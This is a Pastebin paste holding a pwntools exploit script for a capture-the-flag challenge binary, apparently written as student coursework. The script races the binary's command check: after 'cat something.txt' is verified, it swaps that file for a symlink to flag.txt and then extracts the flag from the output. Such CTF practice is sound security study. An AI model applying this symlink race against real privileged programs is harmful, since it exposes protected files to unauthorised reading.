Advertisement
xosski

Ctf binary

Dec 13th, 2024
12
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.39 KB | None | 0 0
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-
  3. # This exploit template was generated via:
  4. # $ pwn template ./main.elf
  5. from pwn import *
  6. import re
  7. import os
  8. import shutil
  9.  
  10. # Set up pwntools for the correct architecture
  11. exe = context.binary = ELF(args.EXE or './main.elf')
  12.  
  13. # This is necessary to spawn the debugger in a separate panel
  14. # Make sure to start tmux before using the GDB argument, else you will get some error
  15. context(terminal=['tmux', 'split-window', '-h'])
  16.  
  17. # Regex used to find the flag in the output of the program
  18. flag_regex = re.compile(r"(InfoSec{.+?})")
  19.  
  20. # Many built-in settings can be controlled on the command-line and show up
  21. # in "args". For example, to dump all data sent/received, and disable ASLR
  22. # for all created processes...
  23. # ./exploit.py DEBUG NOASLR
  24.  
  25. def start(argv=[], *a, **kw):
  26. '''Start the exploit against the target.'''
  27. if args.GDB:
  28. return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
  29. else:
  30. return process([exe.path] + argv, *a, **kw)
  31.  
  32. # Specify your GDB script here for debugging
  33. # GDB will be launched if the exploit is run via e.g.
  34. # ./exploit.py GDB
  35. gdbscript = '''
  36. tbreak main
  37. continue
  38. '''.format(**locals())
  39.  
  40. # Start the process
  41. io = start()
  42.  
  43. # Student Code Area
  44. ########################################################################
  45.  
  46. # Check if 'something.txt' exists and remove it
  47. def remove_file(file_path):
  48. if os.path.exists(file_path):
  49. os.unlink(file_path)
  50. log.info(f"Removed file: {file_path}")
  51.  
  52. # Ensure 'something.txt' is written
  53. def create_something_txt():
  54. with open("something.txt", "w") as f:
  55. f.write("something")
  56. log.info("Created 'something.txt' with content.")
  57.  
  58. # Function to handle reading output until specific pattern is found
  59. def wait_for_output(pattern, timeout=5):
  60. output = b""
  61. io.settimeout(timeout)
  62. while True:
  63. try:
  64. data = io.recv(timeout=1)
  65. if data:
  66. output += data
  67. if pattern in output:
  68. return output
  69. except EOFError:
  70. break
  71. return output
  72.  
  73. # Clean up previous 'something.txt' if it exists
  74. remove_file("something.txt")
  75.  
  76. # Create a new 'something.txt'
  77. create_something_txt()
  78.  
  79. # Send the 'cat something.txt' command
  80. io.sendline(b"cat something.txt")
  81.  
  82. # Wait for the program's response
  83. log.info("Waiting for output...")
  84. output = wait_for_output(b"Verified command, running...")
  85.  
  86. # Clean up 'something.txt' and create symlink to 'flag.txt'
  87. remove_file("something.txt")
  88. log.info("Creating symlink to flag.txt...")
  89. os.symlink("flag.txt", "something.txt")
  90.  
  91. # If 'solution.txt' exists, remove it and copy the symlinked file
  92. remove_file("solution.txt")
  93. shutil.copy("something.txt", "solution.txt")
  94. log.info("Copied symlinked 'something.txt' to 'solution.txt'.")
  95.  
  96. # Wait for final output (to ensure the flag is printed in the output)
  97. log.info("Waiting for final output to extract the flag...")
  98. output = wait_for_output(b"Verified command, running...")
  99.  
  100. # Attempt to extract the flag using regex
  101. flag_match = flag_regex.search(output.decode())
  102. if flag_match:
  103. log.success(f"Flag found: {flag_match.group(0)}")
  104. else:
  105. log.error("Flag not found in output.")
  106.  
  107. # End of exploit, interactive mode for manual inspection if needed
  108. io.interactive()
  109.  
  110. ########################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement